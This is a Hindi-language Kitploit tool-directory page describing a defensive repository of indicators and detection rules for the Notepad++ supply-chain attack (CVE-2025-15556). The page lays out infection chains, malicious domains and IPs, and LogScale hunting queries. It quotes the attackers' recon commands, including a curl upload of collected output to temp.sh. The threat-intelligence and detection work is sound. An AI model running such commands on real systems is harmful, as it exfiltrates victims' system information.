Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
notepadpp-supply-chain-iocs — Notepad++ आपूर्ति श्रृंखला हमले (CVE-2025-15556) — Lotus Blossom APT, जून–दिसंबर 2025 के लिए IoCs और डिटेक्शन नियम। इसमें Falcon LogScale क्वेरी, YARA/Sigma नियम और MITRE ATT&CK मैपिंग शामिल है। | Kitploit
उपकरण/GitHubGitHub/renat0z3r0/notepadpp-supply-chain-iocs
समझौता संकेतक (IOC) प्रबंधनखतरा फ़ीड और एग्रीगेटरभेद्यता विश्लेषणफोरेंसिकमालवेयर विश्लेषणखतरा खुफियाआपूर्ति श्रृंखला सुरक्षालर्निंग और शिक्षाघटना प्रतिक्रिया

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
GitHubrenat0z3r0/notepadpp-supply-chain-iocs

notepadpp-supply-chain-iocs

Notepad++ आपूर्ति श्रृंखला हमले (CVE-2025-15556) — Lotus Blossom APT, जून–दिसंबर 2025 के लिए IoCs और डिटेक्शन नियम। इसमें Falcon LogScale क्वेरी, YARA/Sigma नियम और MITRE ATT&CK मैपिंग शामिल है।

रिपॉजिटरी देखें
1197 महीने पहलेअभी तक समीक्षित नहीं
साझा करें

Notepad++ आपूर्ति श्रृंखला हमला — IoC भंडार

CVE-2025-15556 | लोटस ब्लॉसम / रास्पबेरी टाइफून | जून – दिसंबर 2025

Last Updated IoC Count License: MIT MITRE ATT&CK


अवलोकन

इस भंडार में Notepad++ आपूर्ति श्रृंखला हमले (जिसका खुलासा 2 फरवरी, 2026 को हुआ) से संबंधित समझौता संकेतकों (IoCs) का एक व्यापक, एकीकृत संग्रह है।

जून से दिसंबर 2025 के बीच, एक चीनी राज्य-प्रायोजित खतरा अभिनेता ने Notepad++ की होस्टिंग बुनियादी ढांचे से समझौता किया, अंतर्निहित अपडेट तंत्र (WinGUp) को हाईजैक करके लक्षित उपयोगकर्ताओं को चुनिंदा रूप से ट्रोजनाइज्ड इंस्टॉलर वितरित किए। हमले ने अपडेटर (पूर्व-8.8.9) में क्रिप्टोग्राफ़िक सत्यापन की कमी का फायदा उठाया, जिससे कस्टम बैकडोर, Cobalt Strike Beacons और Metasploit पेलोड का वितरण संभव हुआ।

मुख्य तथ्य

CVECVE-2025-15556 — अखंडता जांच के बिना कोड का डाउनलोड
खतरा अभिनेतालोटस ब्लॉसम (बिलबग, रास्पबेरी टाइफून, थ्रिप) / जिर्कोनियम (वायलेट टाइफून)
सक्रिय अवधिजून 2025 – 2 दिसंबर, 2025
हमला वेक्टरWinGUp ऑटो-अपडेटर के माध्यम से आपूर्ति श्रृंखला समझौता
लक्ष्यसरकार, दूरसंचार, वित्तीय सेवाएं, IT प्रदाता (फिलीपींस, वियतनाम, अल साल्वाडोर, ऑस्ट्रेलिया, पूर्वी एशिया)
मैलवेयरक्रिसालिस बैकडोर (कस्टम), Cobalt Strike Beacon, Metasploit Meterpreter
पैच किया गयाNotepad++ v8.8.9+ (प्रमाणपत्र सत्यापन) / v8.9.1+ (XMLDSig सत्यापन)

संक्रमण श्रृंखलाएं

Kaspersky GReAT ने तीन अलग-अलग संक्रमण श्रृंखलाओं की पहचान की, जिन्हें पता लगाने से बचने के लिए लगभग मासिक रूप से घुमाया गया:

श्रृंखला #1 — जुलाई/अगस्त 2025

GUP.exe → update.exe (NSIS) → ProShow.exe (वैध) → "load" फ़ाइल के माध्यम से शोषण
  → Metasploit डाउनलोडर → Cobalt Strike Beacon
  • DLL साइडलोडिंग के बजाय ProShow सॉफ्टवेयर में एक पुरानी कमजोरी का दुरुपयोग करता है
  • टोही: whoami && tasklist → temp.sh के माध्यम से बाहर निकाली गई
  • कार्यशील निर्देशिका: %appdata%\ProShow\

श्रृंखला #2 — सितंबर/अक्टूबर 2025

GUP.exe → update.exe (NSIS) → script.exe (Lua दुभाषिया) → alien.ini (संकलित Lua)
  → EnumWindowStationsW के माध्यम से शेलकोड → Metasploit डाउनलोडर → Cobalt Strike Beacon
  • संकलित शेलकोड को निष्पादित करने के लिए एक वैध Lua दुभाषिया का उपयोग करता है
  • विस्तारित टोही: whoami && tasklist && systeminfo && netstat -ano
  • कार्यशील निर्देशिका: %appdata%\Adobe\Scripts\

श्रृंखला #3 — अक्टूबर 2025

GUP.exe → update.exe (NSIS) → BluetoothService.exe (वैध) → log.dll (साइडलोडेड)
  → "BluetoothService" शेलकोड को डिक्रिप्ट करता है → क्रिसालिस बैकडोर
  • क्लासिक DLL साइडलोडिंग तकनीक
  • कोई अंतर्निहित टोही नहीं (श्रृंखला 1 और 2 के विपरीत)
  • कार्यशील निर्देशिका: %appdata%\Bluetooth\
  • संबद्ध Cobalt Strike Beacon C:\ProgramData\USOShared\ में पाया गया
                     ┌─────────────────────────────────────────────────────────┐
                     │              COMPROMISE TIMELINE                        │
                     ├─────────┬─────────┬─────────┬─────────┬─────────┬──────┤
                     │  Jul 25 │  Aug 25 │  Sep 25 │  Oct 25 │  Nov 25 │Dec 25│
                     ├─────────┴─────────┴─────────┴─────────┴─────────┴──────┤
  Chain #1 (ProShow) │████████████████████                                    │
  Chain #2 (Lua)     │                    █████████████████████████████        │
  Chain #3 (DLL SL)  │                              ██████████████            │
  Infra access       │████████████████████████████████████████████████████████│
                     └────────────────────────────────────────────────────────┘

भंडार सामग्री

फ़ाइलविवरण
notepadpp_supply_chain_iocs.csvपूर्ण IoC डेटासेट (105 संकेतक) MITRE ATT&CK मैपिंग के साथ

CSV स्कीमा

कॉलमविवरण
ioc_typeप्रकार: ip, domain, url, sha1, sha256, filepath, filename, useragent, behavior, cve, attribution, compromise_window
ioc_valueसंकेतक मान
chainसंक्रमण श्रृंखला (1, 2, 3, 1/2, 2/3, all, n/a)
contextIoC क्या दर्शाता है, इसका विवरण
sourceखुफिया स्रोत (Kaspersky, Rapid7, CrowdStrike, Tenable, Kevin Beaumont)
riskगंभीरता (CRITICAL, HIGH, MEDIUM, LOW, INFO)
mitre_techniqueMITRE ATT&CK तकनीक ID

पता लगाना और खतरे की खोज

प्राथमिकता संकेतक (यहां से शुरू करें)

व्यवहारिक — IoC-अज्ञेय, उच्चतम मूल्य:

  • gup.exe एक वैध हस्ताक्षरित Notepad++ इंस्टॉलर के अलावा कोई भी चाइल्ड प्रक्रिया बनाता है
  • gup.exe notepad-plus-plus.org, github.com, release-assets.githubusercontent.com के अलावा अन्य डोमेन/IP से कनेक्ट होता है
  • निर्देशिकाओं का निर्माण: %appdata%\ProShow\, %appdata%\Adobe\Scripts\, %appdata%\Bluetooth\
  • %localappdata%\Temp\ns.tmp\ का निर्माण (NSIS रनटाइम — सभी श्रृंखलाओं में मौजूद)

नेटवर्क — उच्च विश्वास:

  • cdncheck.it.com, safe-dns.it.com, self-dns.it.com, api.skycloudcenter.com, api.wiresguard.com का DNS समाधान
  • temp.sh (51.91.79.17) से कनेक्शन — विशेष रूप से curl के माध्यम से फ़ाइल अपलोड के साथ
  • User-Agent हेडर में temp.sh URL एम्बेडेड HTTP अनुरोध
  • 45.76.155.202, 45.32.144.255, 95.179.213.0, 45.77.31.210 पर आउटबाउंड कनेक्शन

टोही कमांड (पोस्ट-एक्सप्लॉइटेशन):

cmd /c whoami&&tasklist > 1.txt
cmd /c "whoami&&tasklist&&systeminfo&&netstat -ano" > a.txt
curl -F "[email protected]" -s https://temp.sh/upload

CrowdStrike Falcon LogScale क्वेरीज़

व्यवहारिक: GUP.exe चाइल्ड प्रक्रिया खोज
#event_simpleName=ProcessRollup2 event_platform=Win ParentBaseFileName="gup.exe"
| FilePath=/\\Device\\HarddiskVolume\d+(?<shortFilePath>.+$)/
| groupBy([FileName, SHA256HashData, shortFilePath, CommandLine])
प्रक्रिया, नेटवर्क और DNS घटनाओं में मल्टी-IoC खोज
#event_simpleName=/(ProcessRollup2|NetworkConnectIP4|DnsRequest)/ event_platform=Win
| case {
    // दुर्भावनापूर्ण IP
    RemoteAddressIP4=/(95\.179\.213\.0|61\.4\.102\.97|59\.110\.7\.32|124\.222\.137\.114|45\.76\.155\.202|45\.32\.144\.255|45\.77\.31\.210)/
        | iocType := "Malicious IP" | iocValue := RemoteAddressIP4 | riskScore := "HIGH";
    // दुर्भावनापूर्ण डोमेन
    DomainName=/(api\.skycloudcenter\.com|api\.wiresguard\.com|cdncheck\.it\.com|safe-dns\.it\.com|self-dns\.it\.com|temp\.sh)/i
        | iocType := "Malicious Domain" | iocValue := DomainName | riskScore := "HIGH";
    // संदिग्ध फ़ाइल नाम
    ImageFileName=/\\(BluetoothService|admin|system|loader1|loader2|s047t5g|ConsoleApplication2|3yzr31vk|uffhxpSy)\.exe$/i
        | iocType := "Suspicious Filename" | iocValue := ImageFileName | riskScore := "MEDIUM";
    // संदिग्ध DLL
    ImageFileName=/\\(log\.dll|libtcc\.dll)$/i
        | iocType := "Suspicious DLL" | iocValue := ImageFileName | riskScore := "MEDIUM";
    // श्रृंखला-विशिष्ट कलाकृतियां
    ImageFileName=/\\(alien\.ini|load)$/i
        | iocType := "Chain Artifact" | iocValue := ImageFileName | riskScore := "HIGH";
    * | iocType := null;
}
| iocType=*
| ImageFileName=/\\(?<FileName>[^\\]+)$/
| table([riskScore, iocType, iocValue, @timestamp, aid, ComputerName, FileName, ImageFileName, CommandLine, SHA256HashData, RemoteAddressIP4, DomainName], limit=5000)
NSIS इंस्टॉलर का पता लगाना (सभी श्रृंखलाएं)
#event_simpleName=DirectoryCreate event_platform=Win
| FilePath=/\\ns\.tmp$/i
| FilePath=/\\Temp\\ns\.tmp$/i
| groupBy([aid, ComputerName, FilePath, ContextTimeStamp], limit=5000)

YARA नियम (NSIS + टोही पैटर्न)

टूल डाउनलोड करें